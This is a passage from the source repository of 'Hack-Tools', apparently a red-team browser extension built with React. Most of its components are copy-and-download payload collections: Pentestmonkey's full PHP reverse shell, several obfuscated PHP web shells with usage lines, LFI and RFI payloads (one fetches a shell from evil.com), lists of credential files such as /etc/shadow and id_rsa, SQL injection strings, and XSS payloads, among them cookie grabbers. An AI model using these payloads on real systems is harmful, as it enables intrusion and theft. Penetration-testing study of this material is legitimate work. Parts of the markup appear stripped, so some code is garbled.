0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={cve_image_logo}\n actions={[\n \n goTo( cxsecurity_choose )} />\n ,\n \n \n \n \n \n ]}\n >\n \n }\n title='CX'\n description='CXSECURITY'\n />\n \n \n \n
\n You have a suggestion about the feed ?\n \n
\n
\n );\n}\n" }, { "path": "src/components/types/EchoFileName.ts", "content": "type EchoFileName = {\n\tname: string;\n\tinput: string;\n};\n" }, { "path": "src/components/types/Ipv4TcpCacheState.ts", "content": "export type Ipv4TcpCacheState = {\n ip: string | number;\n port: string | number;\n output_file_name?: string | number;\n target_file_name?: string | number;\n shell?: string | number;\n};\n" }, { "path": "src/components/types/MSFBuilder.ts", "content": "export type MSFBuilder = {\n\tPayload: string;\n\tLHOST: string;\n\tLPORT: string;\n\tEncoder: string;\n\tEncoderIterations: string;\n\tPlatform: string;\n\tArch: string;\n\tNOP: string;\n\tBadCharacters: string;\n\tFormat: string;\n\tOutfile: string;\n};\n" }, { "path": "src/components/types/ObfuscatedFile.ts", "content": "export type ObfuscatedFile = {\n\tname: string;\n\tinput: string;\n};\n" }, { "path": "src/components/web/LFI.tsx", "content": "import React from 'react';\nimport { Button, message, Typography, Divider } from 'antd';\nimport { CopyOutlined, LinkOutlined } from '@ant-design/icons';\nimport Clipboard from 'react-clipboard.js';\n\nconst { Title, Paragraph, Text } = Typography;\n\nexport default function LFI () {\n const successInfoReverseShell = () => {\n message.success( 'Your payload has been copied successfully !' );\n };\n\n const successInfoEncodeURL = () => {\n message.success( 'Your payload URL encoded has been copied successfully !' );\n };\n\n const directoryTraversal = `foo.php?file=../../../../../../../etc/passwd`;\n const phpWrapperLfi = `/example1.php?page=expect://ls`;\n const phpWrapperFilter = `/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd`;\n const phpRfi = `http://example.com/index.php?page=http://evil.com/shell.txt`;\n const linux = [\n { title: '/etc/passwd' },\n { title: '/etc/shadow' },\n { title: '/etc/issue' },\n { title: '/etc/group' },\n { title: '/etc/hostname' },\n { title: '/etc/ssh/ssh_config' },\n { title: '/etc/ssh/sshd_config' },\n { title: '/root/.ssh/id_rsa' },\n { title: '/root/.ssh/authorized_keys' },\n { title: '/home/$USER/.ssh/authorized_keys' },\n { title: '/home/$USER/.ssh/id_rsa' },\n { title: '/proc/[0-9]*/fd/[0-9]*' },\n { title: '/proc/mounts' },\n { title: '/home/$USER/.bash_history' },\n { title: '/home/$USER/.ssh/id_rsa' },\n { title: '/var/run/secrets/kubernetes.io/serviceaccount' },\n { title: '/var/lib/mlocate/mlocate.db' },\n { title: '/var/lib/mlocate.db' }\n ];\n const apache = [\n { title: '/etc/apache2/apache2.conf' },\n { title: '/usr/local/etc/apache2/httpd.conf' },\n { title: '/etc/httpd/conf/httpd.conf' },\n { title: 'Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log' },\n { title: 'Debian/Ubuntu -> /var/log/apache2/access.log' },\n { title: 'FreeBSD -> /var/log/httpd-access.log' },\n { title: '/var/log/apache/access.log' },\n { title: '/var/log/apache/error.log' },\n { title: '/var/log/apache2/access.log' },\n { title: '/var/log/apache/error.log' }\n ];\n const mysql = [\n { title: '/var/lib/mysql/mysql/user.frm' },\n { title: '/var/lib/mysql/mysql/user.MYD' },\n { title: '/var/lib/mysql/mysql/user.MYI' }\n ];\n const windows = [\n { title: '/boot.ini' },\n { title: '/autoexec.bat' },\n { title: '/windows/system32/drivers/etc/hosts' },\n { title: '/windows/repair/SAM' },\n { title: '/windows/panther/unattended.xml' },\n { title: '/windows/panther/unattend/unattended.xml' },\n { title: '/windows/system32/license.rtf' },\n { title: '/windows/system32/eula.txt' }\n ];\n\n return (\n
\n \n LFI\n \n \n LFI stands for Local File Includes - it's a file local inclusion vulnerability that allows an attacker\n to include files that exist on the target web server.\n \n \n Typically this is exploited by abusing dynamic file inclusion mechanisms that don't sanitize user input.\n \n \n
\n Directory traversal\n \n 
{directoryTraversal}
\n \n \n \n Copy the payload\n \n \n \n \n URL encoded\n \n \n
\n \n \n PHP Wrapper php://file\n \n 
{phpWrapperLfi}
\n \n \n \n \n Copy the payload\n \n \n \n \n URL encoded\n \n \n
\n \n \n PHP Wrapper php://filter\n \n 
{phpWrapperFilter}
\n \n \n \n \n Copy the payload\n \n \n \n \n URL encoded\n \n \n \n \n \n PHP Wrapper php://filter\n \n 
{phpRfi}
\n \n \n \n \n Copy the payload\n \n \n \n \n URL encoded\n \n \n \n \n \n Useful LFI files\n Linux\n {linux.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n Apache\n {apache.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n MySQL\n {mysql.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n Windows\n {windows.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n \n \n );\n};\n" }, { "path": "src/components/web/PhpReverseShell.tsx", "content": "import React from 'react';\r\nimport PersistedState from 'use-persisted-state';\r\nimport { Input, Button, message, Typography, Row, Col, Divider, Collapse } from 'antd';\r\nimport {\r\n CopyOutlined,\r\n WifiOutlined,\r\n DownloadOutlined,\r\n ArrowsAltOutlined,\r\n createFromIconfontCN\r\n} from '@ant-design/icons';\r\nimport Clipboard from 'react-clipboard.js';\r\nimport SyntaxHighlighter from 'react-syntax-highlighter';\r\nimport { Ipv4TcpCacheState } from \"components/types/Ipv4TcpCacheState\";\r\nimport { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs';\r\nimport pretty from 'pretty';\r\n\r\nconst { Title, Paragraph, Text } = Typography;\r\nconst { Panel } = Collapse;\r\nconst IconFont = createFromIconfontCN( {\r\n scriptUrl: [ './iconfont.js' ]\r\n} );\r\n\r\n\r\n\r\nexport default function PhpReverseShell () {\r\n const useIPv4State = PersistedState( 'ipv4_tcp_cache' );\r\n const [ values, setValues ] = useIPv4State( {\r\n ip: '',\r\n port: '',\r\n } );\r\n const handleChange = ( name: string ) => ( event: { target: { value: string; }; } ) => {\r\n setValues( { ...values, [ name ]: event.target.value } );\r\n };\r\n\r\n const [ messageApi, contextHolder ] = message.useMessage();\r\n const successInfoReverseShell = () => {\r\n messageApi.success( 'Your reverse shell has been copied successfully !' );\r\n };\r\n\r\n const oneLiner = ``;\r\n const shell_obfuscate =\r\n `\";\r\n const shell_obfuscate_function =\r\n `;\").($_^\"/\"); ?>` + \"\";\r\n\r\n const phpReverseShell = `\r\n array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\r\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\r\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\r\n );\r\n\r\n $process = proc_open($shell, $descriptorspec, $pipes);\r\n\r\n if (!is_resource($process)) {\r\n printit(\"ERROR: Can't spawn shell\");\r\n exit(1);\r\n }\r\n\r\n // Set everything to non-blocking\r\n // Reason: Occsionally reads will block, even though stream_select tells us they won't\r\n stream_set_blocking($pipes[0], 0);\r\n stream_set_blocking($pipes[1], 0);\r\n stream_set_blocking($pipes[2], 0);\r\n stream_set_blocking($sock, 0);\r\n\r\n printit(\"Successfully opened reverse shell to $ip:$port\");\r\n\r\n while (1) {\r\n // Check for end of TCP connection\r\n if (feof($sock)) {\r\n printit(\"ERROR: Shell connection terminated\");\r\n break;\r\n }\r\n\r\n // Check for end of STDOUT\r\n if (feof($pipes[1])) {\r\n printit(\"ERROR: Shell process terminated\");\r\n break;\r\n }\r\n\r\n // Wait until a command is end down $sock, or some\r\n // command output is available on STDOUT or STDERR\r\n $read_a = array($sock, $pipes[1], $pipes[2]);\r\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\n\r\n // If we can read from the TCP socket, send\r\n // data to process's STDIN\r\n if (in_array($sock, $read_a)) {\r\n if ($debug) printit(\"SOCK READ\");\r\n $input = fread($sock, $chunk_size);\r\n if ($debug) printit(\"SOCK: $input\");\r\n fwrite($pipes[0], $input);\r\n }\r\n\r\n // If we can read from the process's STDOUT\r\n // send data down tcp connection\r\n if (in_array($pipes[1], $read_a)) {\r\n if ($debug) printit(\"STDOUT READ\");\r\n $input = fread($pipes[1], $chunk_size);\r\n if ($debug) printit(\"STDOUT: $input\");\r\n fwrite($sock, $input);\r\n }\r\n\r\n // If we can read from the process's STDERR\r\n // send data down tcp connection\r\n if (in_array($pipes[2], $read_a)) {\r\n if ($debug) printit(\"STDERR READ\");\r\n $input = fread($pipes[2], $chunk_size);\r\n if ($debug) printit(\"STDERR: $input\");\r\n fwrite($sock, $input);\r\n }\r\n }\r\n\r\n fclose($sock);\r\n fclose($pipes[0]);\r\n fclose($pipes[1]);\r\n fclose($pipes[2]);\r\n proc_close($process);\r\n\r\n // Like print, but does nothing if we've daemonised ourself\r\n // (I can't figure out how to redirect STDOUT like a proper daemon)\r\n function printit ($string) {\r\n if (!$daemon) {\r\n print \"$string\\n\";\r\n }\r\n }\r\n\r\n ?> \r\n `;\r\n return (\r\n
\r\n {contextHolder}\r\n
\r\n \r\n PHP Reverse Shell\r\n \r\n \r\n Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to\r\n obtain an interactive shell session on the target machine and continue their attack.\r\n \r\n
\r\n \r\n \r\n }\r\n name='Ip adress'\r\n placeholder='IP Address or domain (ex: 212.212.111.222)'\r\n onChange={handleChange( 'ip' )}\r\n value={values.ip}\r\n />\r\n \r\n \r\n }\r\n name='Port'\r\n placeholder='Port (ex: 1337)'\r\n onChange={handleChange( 'port' )}\r\n value={values.port}\r\n />\r\n \r\n \r\n
\r\n
\r\n Pentestmonkey's reverse shell\r\n \r\n This script will make an outbound TCP connection to a hardcoded IP and port.\r\n \r\n \r\n \r\n {pretty( phpReverseShell )}\r\n \r\n \r\n \r\n \r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ phpReverseShell ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'rev.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n \r\n Download\r\n \r\n \r\n \r\n \r\n Copy\r\n \r\n \r\n
\r\n Basic RCE\r\n \r\n \r\n When you have successfully uploaded your payload, just put your commands after the variable ?cmd=\r\n (ex: ?cmd=ls -la\")\r\n \r\n 
{oneLiner}
\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ oneLiner ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'basicRCE.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n \r\n Download\r\n \r\n \r\n \r\n \r\n Copy\r\n \r\n \r\n \r\n Web Shell\r\n \r\n \r\n p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands\r\n on a server when pentesting a PHP application.\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Obfuscated PHP Web Shell\r\n \r\n 
{''}
\r\n {' Usage : http://target.com/path/to/shell.php?0=command '}\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ '' ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'obfuscateShell.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n Download\r\n \r\n '}>\r\n \r\n \r\n \r\n \r\n 
{''}
\r\n {' Usage : curl -X POST http://target.com/path/to/shell.php -d \"0=command\" '}\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ '' ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'obfuscateShell.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n Download\r\n \r\n '}>\r\n \r\n \r\n \r\n \r\n 
{\"\"}
\r\n Usage :\r\n - http://target.com/path/to/shell.php?_=command\r\n - curl -X POST http://target.com/path/to/shell.php -d \"_=command\" '\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ \"\" ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'obfuscateShell.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n Download\r\n \r\n \"}>\r\n \r\n \r\n \r\n \r\n 
{shell_obfuscate}
\r\n Usage :\r\n - http://target.com/path/to/shell.php?0=command\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ shell_obfuscate ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'obfuscateShell.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n Download\r\n \r\n \r\n \r\n \r\n \r\n \r\n 
{shell_obfuscate_function}
\r\n Usage :\r\n - http://target.com/path/to/shell.php?_=function&__=argument\r\n - http://target.com/path/to/shell.php?_=system&__=ls\r\n {\r\n const element = document.createElement( 'a' );\r\n const file = new Blob( [ shell_obfuscate_function ], {\r\n type: 'text/plain'\r\n } );\r\n element.href = URL.createObjectURL( file );\r\n element.download = 'obfuscateShell.php';\r\n document.body.appendChild( element );\r\n element.click();\r\n }}\r\n >\r\n Download\r\n \r\n \r\n \r\n \r\n \r\n \r\n );\r\n};\r\n" }, { "path": "src/components/web/SqlInjection.tsx", "content": "import React from 'react';\nimport { Typography, Divider } from 'antd';\n\nconst { Title, Paragraph, Text, Link } = Typography;\n\nexport default function SQLi () {\n const DbColumnNumber = [\n {\n db_type: 'MySQL/MSSQL/PGSQL',\n title: \"'UNION SELECT NULL,NULL,NULL -- -\"\n },\n {\n db_type: 'ORACLE',\n title: \"'UNION SELECT NULL,NULL,NULL FROM DUAL -- -\"\n },\n {\n db_type: 'MYSQL/MSSQL/PGSQL/ORACLE - (add +1 until you get an exception)',\n title: \"' UNION ORDER BY 1 -- -\"\n },\n ]\n\n const DbVersionEnumeration = [\n {\n db_type: 'MySQL/MSSQL',\n title: `' UNION SELECT @@version -- -`\n },\n {\n db_type: 'Oracle',\n title: `' UNION SELECT banner from v$version -- -`\n },\n {\n db_type: 'Oracle(2nd method)',\n title: `' UNION SELECT version from v$instance -- -`\n },\n {\n db_type: 'Postgres',\n title: `' UNION SELECT version() -- -`\n }\n ]\n\n const DbTableEnumeration = [\n {\n db_type: 'MySQL/MSSQL/Postgres',\n title: `' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -`\n },\n {\n db_type: 'Oracle',\n title: `' UNION SELECT table_name,NULL FROM all_tables -- -`\n },\n ]\n\n const DbColumnEnumeration = [\n {\n db_type: 'MySQL/MSSQL/Postgres',\n title: `' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name=\"X\" -- -`\n },\n {\n db_type: 'Oracle',\n title: `' UNION SELECT column_name,NULL FROM all_tab_columns where table_name=\"X\" -- -`\n },\n ]\n\n const DbColValueConcatenation = [\n {\n db_type: 'MySQL/Postgres',\n title: `' UNION SELECT concat(col1,':',col2) from table_name limit 1 -- -`\n },\n {\n db_type: 'MySQL(2nd method)',\n title: `' UNION SELECT col1 ':' col2 from table_name limit 1 -- -`\n\n },\n {\n db_type: 'Oracle / Postgres',\n title: `' UNION SELECT select col1 ||':'||col2, null FROM where table_name=\"X\" -- -`\n },\n {\n db_type: 'MSSQL',\n title: `' UNION SELECT col1+':'+col2,NULL from table_name limit 1 -- -`\n },\n ]\n\n const DbConditionalErrors = [\n {\n db_type: 'MySQL',\n title: `' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -`\n },\n {\n db_type: 'Postgres',\n title: `' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -`\n },\n {\n db_type: 'Oracle',\n title: `' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -`\n },\n {\n db_type: 'MSSQL',\n title: `' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -`\n },\n\n ]\n const TimeBased = [\n { title: ',(select * from (select(sleep(10)))a)' },\n { title: \"';WAITFOR DELAY '0:0:30'--\" }\n ];\n\n const AuthBased = [\n { title: 'or true--' },\n { title: '\") or true--' },\n { title: \"') or true--\" },\n { title: \"admin') or ('1'='1'--\" },\n { title: \"admin') or ('1'='1'#\" },\n { title: \"admin') or ('1'='1'/\" }\n ];\n const OrderUnion = [\n { title: \"1' ORDER BY 1--+\" },\n { title: \"1' ORDER BY 2--+\" },\n { title: \"1' ORDER BY 3--+\" },\n { title: \"1' ORDER BY 1,2--+\" },\n { title: \"1' ORDER BY 1,2,3--+\" },\n { title: \"1' GROUP BY 1,2,--+\" },\n { title: \"1' GROUP BY 1,2,3--+\" },\n { title: \"' GROUP BY columnnames having 1=1 --\" },\n { title: \"-1' UNION SELECT 1,2,3--+\" },\n { title: \"' UNION SELECT sum(columnname ) from tablename --\" },\n { title: '-1 UNION SELECT 1 INTO @,@' },\n { title: '-1 UNION SELECT 1 INTO @,@,@' },\n { title: '1 AND (SELECT * FROM Users) = 1\t' },\n { title: \"' AND MID(VERSION(),1,1) = '5';\" },\n {\n title: \"' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --\"\n }\n ];\n return (\n
\n \n SQL Injection\n \n \n SQL injection (SQLi) is an application security weakness that allows attackers to control an\n application’s database letting them access or delete data, change an application’s data-driven behavior,\n and do other undesirable things by tricking the application into sending unexpected SQL commands.\n \n \n
\n Number of column\n {DbColumnNumber.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n\n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n
\n Database enumeration\n {DbVersionEnumeration.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n
\n Tablename enumeration\n {DbTableEnumeration.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n
\n Column name enumeration\n {DbColumnEnumeration.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n
\n Column values concatenation\n {DbColValueConcatenation.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n
\n Conditional ( Error Based ) \n {DbConditionalErrors.map( ( k, i ) => {\n return (\n <>\n \n {k.db_type}\n \n \n 
{k.title}
\n \n \n );\n } )}\n
\n \n \n Time-Based\n {TimeBased.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n \n \n Generic Error Based Payloads\n {DbConditionalErrors.map( ( k, i ) => {\n return (\n \n {k.db_type}\n 
{k.title}
\n \n );\n } )}\n \n \n \n Authentication Based Payloads\n {AuthBased.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n \n \n Order by and UNION Based Payloads\n {OrderUnion.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n \n );\n}\n" }, { "path": "src/components/web/XSS.tsx", "content": "import React from 'react';\nimport { Typography, Divider } from 'antd';\n\nconst { Title, Paragraph, Text } = Typography;\n\nexport default function XSS () {\n const DataGrabber = [\n {\n title: \"\"\n },\n {\n title:\n \"\"\n },\n {\n title: \"\"\n },\n {\n title:\n \"\"\n }\n ];\n const BasicXSS = [\n { title: \"\" },\n { title: \"ipt>alert('XSS')ipt>\" },\n { title: '\">' },\n { title: '\">' }\n ];\n const ImgPayload = [\n { title: \"\" },\n { title: \"' },\n {\n title: ''\n },\n { title: 'xss' },\n { title: '\">' },\n { title: '\">' }\n ];\n const XSSMarkdown = [\n { title: '[a](javascript:prompt(document.cookie))' },\n { title: '[a](j a v a s c r i p t:prompt(document.cookie))' },\n {\n title: '[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)'\n },\n { title: '[a](javascript:window.onerror=alert;throw%201)' }\n ];\n const XSSSvg = [\n {\n title: \"\"\n },\n { title: '</desc><script>alert(1)</script>' },\n {\n title: '</foreignObject><script>alert(2)</script>'\n },\n {\n title: '</title><script>alert(3)</script>'\n }\n ];\n const BypassWord = [\n { title: \"eval('ale'+'rt(0)');\" },\n { title: \"Function('ale'+'rt(1)')();\" },\n { title: 'new Function`alert`6``;' },\n { title: \"setTimeout('ale'+'rt(2)');\" },\n { title: \"setInterval('ale'+'rt(10)');\" },\n { title: \"Set.constructor('ale'+'rt(13)')();\" },\n { title: 'Set.constructor`al\\x65rt\\x2814\\x29```;' }\n ];\n return (\n
\n \n Cross Site Scripting (XSS)\n \n \n Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into\n otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send\n malicious code, generally in the form of a browser side script, to a different end user.\n \n \n Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses\n input from a user within the output it generates without validating or encoding it.\n \n Data grabber for XSS\n \n \n Obtains the administrator cookie or sensitive access token, the following payload will send it to a\n controlled page.\n \n {DataGrabber.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n XSS in HTML/Applications\n \n {BasicXSS.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n {ImgPayload.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n XSS in Markdown\n \n {XSSMarkdown.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n XSS in SVG (short)\n \n {XSSSvg.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n Bypass word blacklist with code evaluation\n \n {BypassWord.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n \n \n );\n}\n" }, { "path": "src/devtools/devtools.html", "content": "\r\n\r\n\r\n\r\n \r\n\r\n\r\n" }, { "path": "src/devtools/devtools.js", "content": "navigator.userAgent.indexOf('Firefox') != -1 &&\r\n\tbrowser.devtools.panels.create('HackTools', 'get_started16.png', 'index.html');\r\n\r\nnavigator.userAgent.indexOf('Chrome') != -1 &&\r\n\tchrome.devtools.panels.create(\r\n\t\t'HackTools', // title for the panel tab\r\n\t\tnull, // path to an icon\r\n\t\t'index.html', // html page which is gonna be injecting into the tab's content\r\n\t\tnull // callback function here\r\n\t);\r\n" }, { "path": "src/index.html", "content": "\r\n\r\n\r\n\r\n \r\n Hack-Tools\r\n\r\n\r\n\r\n
\r\n\r\n\r\n" }, { "path": "src/manifest.json", "content": "{\r\n \"name\": \"Hack-Tools\",\r\n \"version\": \"0.5.0\",\r\n \"description\": \"The all in one Red team extension for web pentester\",\r\n \"action\": {\r\n \"default_title\": \"Hack-Tools\",\r\n \"default_popup\": \"index.html\",\r\n \"default_icon\": {\r\n \"16\": \"./src/assets/img/icons/get_started16.png\",\r\n \"32\": \"./src/assets/img/icons/get_started32.png\",\r\n \"48\": \"./src/assets/img/icons/get_started48.png\",\r\n \"128\": \"./src/assets/img/icons/get_started128.png\"\r\n }\r\n },\r\n \"icons\": {\r\n \"16\": \"./src/assets/img/icons/get_started16.png\",\r\n \"32\": \"./src/assets/img/icons/get_started32.png\",\r\n \"48\": \"./src/assets/img/icons/get_started48.png\",\r\n \"128\": \"./src/assets/img/icons/get_started128.png\"\r\n },\r\n \"manifest_version\": 3,\r\n \"devtools_page\": \"devtools.html\"\r\n}" }, { "path": "tsconfig.json", "content": "{\n \"compilerOptions\": {\n \"jsx\": \"react\",\n \"module\": \"commonjs\",\n \"allowSyntheticDefaultImports\": true,\n \"noImplicitAny\": false,\n \"outDir\": \"./dist/\",\n \"preserveConstEnums\": true,\n \"removeComments\": true,\n \"esModuleInterop\": true,\n \"baseUrl\": \"src\",\n \"sourceMap\": true,\n \"moduleResolution\": \"node\",\n \"target\": \"es6\",\n \"paths\": {\n \"compforms\": [\n \"compforms\"\n ],\n \"components\": [\n \"components\"\n ],\n \"utils\": [\n \"utils\"\n ]\n }\n },\n \"include\": [\n \"./src/**/**/*\"\n ]\n}" }, { "path": "webpack.config.js", "content": "const webpack = require('webpack');\r\nconst path = require('path');\r\nconst HtmlWebpackPlugin = require('html-webpack-plugin');\r\nconst { CleanWebpackPlugin } = require('clean-webpack-plugin');\r\nconst CopyWebpackPlugin = require('copy-webpack-plugin');\r\nconst ReactRefreshWebpackPlugin = require('@pmmmwh/react-refresh-webpack-plugin');\r\nconst { theme } = require('antd/lib');\r\nconst { convertLegacyToken } = require('@ant-design/compatible/lib');\r\nconst { defaultAlgorithm, defaultSeed } = theme;\r\nconst mapToken = defaultAlgorithm(defaultSeed);\r\nconst v4Token = convertLegacyToken(mapToken);\r\n\r\nconst lessLoader = {\r\n\tloader: 'less-loader',\r\n\toptions: {\r\n\t\tlessOptions: {\r\n\t\t\tjavascriptEnabled: true,\r\n modifyVars: v4Token,\r\n\t\t}\r\n\t}\r\n};\r\n\r\n\r\n\r\nmodule.exports = {\r\n\tmode: 'development',\r\n\tentry: {\r\n\t\tapp: './src/App.tsx'\r\n\t},\r\n\tplugins: [\r\n\t\tnew webpack.HotModuleReplacementPlugin(),\r\n\t\tnew CleanWebpackPlugin(),\r\n\t\tnew ReactRefreshWebpackPlugin(),\r\n\t\tnew HtmlWebpackPlugin({\r\n\t\t\ttitle: 'Output Management',\r\n\t\t\ttemplate: './src/index.html'\r\n\t\t}),\r\n\t\tnew CopyWebpackPlugin({\r\n\t\t\tpatterns: [\r\n\t\t\t\t{\r\n\t\t\t\t\tfrom: './src/manifest.json',\r\n\t\t\t\t\tto: './',\r\n\t\t\t\t\tnoErrorOnMissing: true\r\n\t\t\t\t},\r\n\t\t\t\t{\r\n\t\t\t\t\tfrom: './src/assets/img/icons/*',\r\n\t\t\t\t\tto: './',\r\n\t\t\t\t\tnoErrorOnMissing: true\r\n\t\t\t\t},\r\n\t\t\t\t{\r\n\t\t\t\t\tfrom: './src/assets/icons/*',\r\n\t\t\t\t\tto: './',\r\n\t\t\t\t\tnoErrorOnMissing: true\r\n\t\t\t\t},\r\n\t\t\t\t{\r\n\t\t\t\t\tfrom: './src/devtools/*',\r\n\t\t\t\t\tto: './',\r\n\t\t\t\t\tnoErrorOnMissing: true\r\n\t\t\t\t},\r\n\t\t\t\t{\r\n\t\t\t\t\tfrom: './src/assets/img/icons/iconfont.js',\r\n\t\t\t\t\tto: './',\r\n\t\t\t\t\tnoErrorOnMissing: true\r\n\t\t\t\t}\r\n\t\t\t]\r\n\t\t})\r\n\t],\r\n\tresolve: {\r\n\t\textensions: [ '.js', '.jsx', '.tsx', '.ts' ],\r\n\t\talias: {\r\n\t\t\t'react-dom': '@hot-loader/react-dom'\r\n\t\t}\r\n\t},\r\n\toutput: {\r\n\t\tfilename: '[name].bundle.js',\r\n\t\tpath: path.resolve(__dirname, 'dist')\r\n\t},\r\n\toptimization: {\r\n\t\tsplitChunks: {\r\n\t\t\tchunks: 'all'\r\n\t\t}\r\n\t},\r\n\tmodule: {\r\n\t\trules: [\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.(js|jsx)$/,\r\n\t\t\t\tinclude: path.resolve(__dirname, 'src'),\r\n\t\t\t\tloader: 'babel-loader'\r\n\t\t\t},\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.(ts|tsx)$/,\r\n\t\t\t\tloader: 'ts-loader',\r\n\t\t\t\texclude: /node_modules/\r\n\t\t\t},\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.(png|svg|jpg|gif)$/,\r\n\t\t\t\tinclude: path.resolve(__dirname, 'src'),\r\n\t\t\t\tuse: [ 'file-loader' ]\r\n\t\t\t},\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.(woff|woff2|eot|ttf|otf)$/,\r\n\t\t\t\tinclude: path.resolve(__dirname, 'src'),\r\n\t\t\t\tuse: [ 'file-loader' ]\r\n\t\t\t},\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.theme\\.(less|css)$/i,\r\n\t\t\t\tuse: [\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tloader: 'style-loader',\r\n\t\t\t\t\t\toptions: { injectType: 'lazyStyleTag' }\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'css-loader',\r\n\t\t\t\t\tlessLoader\r\n\t\t\t\t]\r\n\t\t\t},\r\n\t\t\t{\r\n\t\t\t\ttest: /\\.(less|css)$/,\r\n\t\t\t\texclude: /\\.theme\\.(less|css)$/i,\r\n\t\t\t\tuse: [ 'style-loader', 'css-loader' ]\r\n\t\t\t}\r\n\t\t]\r\n\t}\r\n};\r\n" } ]